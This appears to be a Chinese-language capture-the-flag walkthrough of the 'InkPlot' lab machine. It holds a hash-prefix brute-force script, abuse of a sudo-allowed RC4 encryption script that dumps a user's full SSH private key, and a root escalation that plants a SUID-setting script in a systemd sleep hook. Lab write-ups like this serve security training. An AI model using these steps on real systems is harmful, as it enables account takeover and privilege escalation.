难度:medium
kali:192.168.56.104
靶机:192.168.56.155
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.155 -sV -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-18 19:19 CST
Nmap scan report for 192.168.56.155
Host is up (0.00064s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
3000/tcp open websocket Ogar agar.io server
MAC Address: 08:00:27:4F:23:0D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.56.155
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.53 seconds
开放了22 3000两个端口,3000端口开了websocket服务,连接看看
websocket
用websocat连接
安装websocat
curl –proto ‘=https’ –tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
cargo install websocat
┌──(root㉿kali2)-[~/Desktop]
└─# websocat ws://192.168.56.155:3000/
Welcome to our InkPlot secret IRC server
Bob: Alice, ready to knock our naive Leila off her digital pedestal?
Alice: Bob, I've been dreaming about this for weeks. Leila has no idea what's about to hit her.
Bob: Exactly. We're gonna tear her defense system apart. She won't see it coming.
Alice: Poor Leila, always so confident. Let's do this.
Bob: Alice, I'll need that MD5 hash to finish the job. Got it?
Alice: Yeah, I've got it. Time to shake Leila's world.
Bob: Perfect. Release it.
Alice: Here it goes: d51540...
*Alice has disconnected*
Bob: What?! Damn it, Alice?! Not now!
给了md的前几位d51540
写个脚本爆破一下
#!/bin/bash
# rockyou.txt 字典文件路径
rockyou_file="/usr/share/wordlists/rockyou.txt"
# 检查 rockyou.txt 文件是否存在
if [ ! -f "$rockyou_file" ]; then
echo "Error: $rockyou_file not found."
exit 1
fi
echo "Searching for password..."
# 读取rockyou.txt字典文件,逐行处理每个密码
while IFS= read -r password; do
# 使用echo命令将密码传递给md5sum命令,然后提取md5sum的输出并取出哈希值部分
md5_hash=$(echo -n "$password" | md5sum | awk '{print $1}')
# 显示当前处理的密码和哈希值
echo "Processing password: $password (MD5: $md5_hash)"
# 检查MD5哈希值的前6位是否是d51540
if [[ ${md5_hash:0:6} == "d51540" ]]; then
echo "Password found: $password"
break
fi
done < "$rockyou_file"
echo "Done"
爆破出来两个密码palmira
intelinside
ssh连接
用用户名leila连接,测试发现密码是intelinside
┌──(root㉿kali2)-[~/Desktop]
└─# ssh leila@192.168.56.155
Auto-standby now activated after 2 min of inactivity
leila@192.168.56.155's password:
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─leila@inkplot ~
╰─$ id
uid=1003(leila) gid=1003(leila) groups=1003(leila),100(users)
leila用户没有user flag,先看home
╭─leila@inkplot ~
╰─$ ls -al /home
total 16
drwxr-xr-x 4 root root 4096 Jul 28 2023 .
drwxr-xr-x 18 root root 4096 Jul 27 2023 ..
drwx---r-x 5 leila leila 4096 Apr 18 14:47 leila
drwx---r-x 5 pauline pauline 4096 Aug 3 2023 pauline
home下还有一个用户pauline
sudo -l
╭─leila@inkplot ~
╰─$ sudo -l
sudo: unable to resolve host inkplot: Temporary failure in name resolution
Matching Defaults entries for leila on inkplot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User leila may run the following commands on inkplot:
(pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py*
发现有个py脚本可以用pauline用户执行
╭─leila@inkplot ~
╰─$ cat /home/pauline/cipher.py*
import os
import json
import argparse
from Crypto.Cipher import ARC4
import base64
with open('/home/pauline/keys.json', 'r') as f:
keys = json.load(f)
crypt_key = keys['crypt_key'].encode()
def encrypt_file(filepath, key):
with open(filepath, 'rb') as f:
file_content = f.read()
cipher = ARC4.new(key)
encrypted_content = cipher.encrypt(file_content)
encoded_content = base64.b64encode(encrypted_content)
base_filename = os.path.basename(filepath)
with open(base_filename + '.enc', 'wb') as f:
f.write(encoded_content)
return base_filename + '.enc'
def decrypt_file(filepath, key):
with open(filepath, 'rb') as f:
encrypted_content = f.read()
decoded_content = base64.b64decode(encrypted_content)
cipher = ARC4.new(key)
decrypted_content = cipher.decrypt(decoded_content)
return decrypted_content
parser = argparse.ArgumentParser(description='Encrypt or decrypt a file.')
parser.add_argument('filepath', help='The path to the file to encrypt or decrypt.')
parser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt the file.')
parser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt the file.')
args = parser.parse_args()
if args.encrypt:
encrypted_filepath = encrypt_file(args.filepath, crypt_key)
print("The encrypted and encoded content has been written to: ")
print(encrypted_filepath)
elif args.decrypt:
decrypt_key = input("Please enter the decryption key: ").encode()
decrypted_content = decrypt_file(args.filepath, decrypt_key)
print("The decrypted content is: ")
print(decrypted_content)
else:
print("Please provide an operation type. Use -e to encrypt or -d to decrypt.")
是一个对文件进行加解密的脚本,密钥在/home/pauline/keys.json
里面
加密方法是先进行RC4加密然后base64编码,然后存储在.enc文件里
RC4加密很简单,就是明文和密钥进行异或,如果对一个文件用同一密钥加密两次就会还原
可以利用这一点对pauline的ssh私钥加密两次获取明文,中间记得用base64解密
╭─leila@inkplot /home/pauline
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e /home/pauline/.ssh/id_rsa 1 ↵
sudo: unable to resolve host inkplot: Temporary failure in name resolution
The encrypted and encoded content has been written to:
id_rsa.enc
╭─leila@inkplot /home/pauline
╰─$ cat id_rsa.enc | base64 -d >/tmp/abc.enc
╭─leila@inkplot /home/pauline
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e /tmp/abc.enc
sudo: unable to resolve host inkplot: Temporary failure in name resolution
The encrypted and encoded content has been written to:
abc.enc.enc
╭─leila@inkplot /home/pauline
╰─$ cat abc.enc.enc| base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
然后用私钥连接ssh,记得600权限
┌──(root㉿kali2)-[~/Desktop]
└─# vim 123.txt
┌──(root㉿kali2)-[~/Desktop]
└─# ssh pauline@192.168.56.155 -i 123.txt
Auto-standby now activated after 2 min of inactivity
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '123.txt' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "123.txt": bad permissions
pauline@192.168.56.155's password:
┌──(root㉿kali2)-[~/Desktop]
└─# chmod 600 123.txt
┌──(root㉿kali2)-[~/Desktop]
└─# ssh pauline@192.168.56.155 -i 123.txt
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─pauline@inkplot ~
╰─$ id
uid=1000(pauline) gid=1000(pauline) groups=1000(pauline),100(users),1002(admin)
拿到user flag
╭─pauline@inkplot ~
╰─$ ls -al
total 72
drwx---r-x 5 pauline pauline 4096 Apr 18 15:10 .
drwxr-xr-x 4 root root 4096 Jul 28 2023 ..
-rw-r--r-- 1 pauline pauline 3472 Apr 18 15:06 abc.enc.enc
-rw-r--r-- 1 pauline pauline 220 Jul 22 2023 .bash_logout
-rw-r--r-- 1 pauline pauline 3526 Jul 22 2023 .bashrc
-rw-r--r-- 1 pauline pauline 1738 Aug 1 2023 cipher.py
-rw-r--r-- 1 pauline pauline 3472 Apr 18 15:05 id_rsa.enc
-rw-r--r-- 1 pauline pauline 4632 Apr 18 15:03 id_rsa.enc.enc
-rw-r----- 1 pauline pauline 44 Jul 25 2023 keys.json
-rw------- 1 pauline pauline 20 Aug 1 2023 .lesshst
drwxr-xr-x 3 pauline pauline 4096 Jul 22 2023 .local
drwxr-xr-x 12 pauline pauline 4096 Jul 22 2023 .oh-my-zsh
-rw-r--r-- 1 pauline pauline 807 Jul 22 2023 .profile
drwx------ 2 pauline pauline 4096 Jul 28 2023 .ssh
-rw-r--r-- 1 pauline pauline 0 Jul 25 2023 .sudo_as_admin_successful
-rwx------ 1 pauline pauline 33 Jul 24 2023 user.txt
-rw------- 1 pauline pauline 203 Apr 18 15:10 .zsh_history
-rw-r--r-- 1 pauline pauline 3890 Jul 22 2023 .zshrc
╭─pauline@inkplot ~
╰─$ cat user.txt| md5sum
85695f22e85b28811add8645febdf8e4 -
提权root
id可以看到pauline所属组为admin 1002(admin)
寻找相关权限
╭─pauline@inkplot ~
╰─$ find / -group admin 2>/dev/null
/usr/lib/systemd/system-sleep
当打开shell的时候都会执行/usr/lib/systemd/system-sleep目录下的脚本
写个脚本
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ ls -al
total 20
drwxrwx--- 2 root admin 4096 Apr 18 15:17 .
drwxr-xr-x 14 root root 12288 Jul 28 2023 ..
-rwxr-xr-x 1 pauline pauline 52 Apr 18 15:17 script
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ cat script
#!/bin/bash
chmod +s /bin/bash
chmod +s /bin/find
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ chmod +x script
然后等,等到提示system被暂停的时候我们可以重启shell然后拿到root权限
pauline@inkplot:~$
Broadcast message from root@inkplot (Thu 2024-04-18 15:30:48 CEST):
The system will suspend now!
client_loop: send disconnect: Broken pipe
┌──(root㉿kali2)-[~/Desktop]
└─# ssh pauline@192.168.56.155 -i 123.txt
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 18 15:26:44 2024 from 192.168.56.104
╭─pauline@inkplot ~
╰─$ bash -p
bash-5.2# id
uid=1000(pauline) gid=1000(pauline) euid=0(root) egid=0(root) groups=0(root),100(users),1000(pauline),1002(admin)
bash-5.2# cat /root/* | md5sum
d02568a00695b655bbeb56bf6f44dd45 -
最后这块没怎么搞懂,跟着wp复现的。